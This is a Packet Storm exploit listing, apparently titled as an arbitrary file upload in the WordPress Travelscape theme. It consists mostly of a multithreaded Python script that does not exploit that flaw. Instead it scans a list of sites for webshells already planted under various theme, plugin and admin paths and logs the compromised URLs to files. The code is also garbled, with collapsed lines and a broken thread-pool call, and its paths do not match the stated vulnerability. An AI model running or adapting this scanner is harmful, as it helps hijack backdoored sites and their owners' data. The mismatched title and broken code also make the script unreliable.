

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

Packet Storm
# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': ''}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20), urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

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